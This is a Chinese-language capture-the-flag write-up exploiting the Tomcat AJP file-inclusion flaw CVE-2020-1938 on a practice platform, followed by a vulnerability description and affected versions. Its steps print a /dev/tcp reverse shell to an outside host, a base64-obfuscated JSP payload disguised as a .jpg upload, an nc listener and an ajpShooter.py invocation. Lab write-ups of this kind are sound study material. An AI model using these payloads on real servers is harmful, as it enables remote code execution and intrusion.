漏洞环境
安鸾渗透实战平台
公网vps
CVE-2020-1938文件包含exp
base64加密网站
题目:
解法:
1、访问对应网页
网页上可以发现一个明显的上传点,而题目是文件包含漏洞,所以可以编写一个代码代码文件上传,然后使用文件包含就行。由于文件包含不限制后缀,这里直接上传.jsp后缀即可
2、制作一个反弹shell文件
写一个反弹shell然后拿去base64加密
bash -i >& /dev/tcp/1.1.1.1/666 0>&1
将加密后的内容做拼接,方便java解析
<%Runtime.getRuntime().exec("bash -c {echo,bash64加密后的内容}|{base64,-d}|{bash,-i}");%>
保存为jpg
3、来到上传点进行上传
上传后系统会把你的文件重命名,为了防止搞混,可以先点击查看所有图片去蹲点
文件上传成功,点击查看图片
找到你上传的图片
鼠标右键点击复制图片连接
5、起一台公网vps使用nc监听反弹shell的端口
nc -lnp 666
6、使用脚本进行文件包含
python ajpShooter.py http://106.15.50.112:18080/whalwl 18009 /upload/2023-000002-000008.jpg eval
- http://106.15.50.112:18080/whalwl:页面位置
- 18009 :ajp端口号
- /upload/2023-000002-000008.jpg :上传反弹shell图片的位置
- eval :执行
当回显200状态码时,证明成功包含并执行文件
7、来到vps上检查效果
使用 find / -name flag 来查找flag
可以看到在根目录上,直接看
cat /flag
漏洞描述
该漏洞使攻击者可以读取任何webapps文件(例如webapp配置文件,源代码等)或包括一个文件来远程执行代码。由于Tomcat默认开启的AJP服务(8009端口)存在一处文件包含缺陷,攻击者可构造恶意的请求包进行文件包含操作,进而读取受影响Tomcat服务器上的Web目录文件。
影响版本
Apache Tomcat 6
Apache Tomcat 7 < 7.0.100
Apache Tomcat 8 < 8.5.51
Apache Tomcat 9 < 9.0.31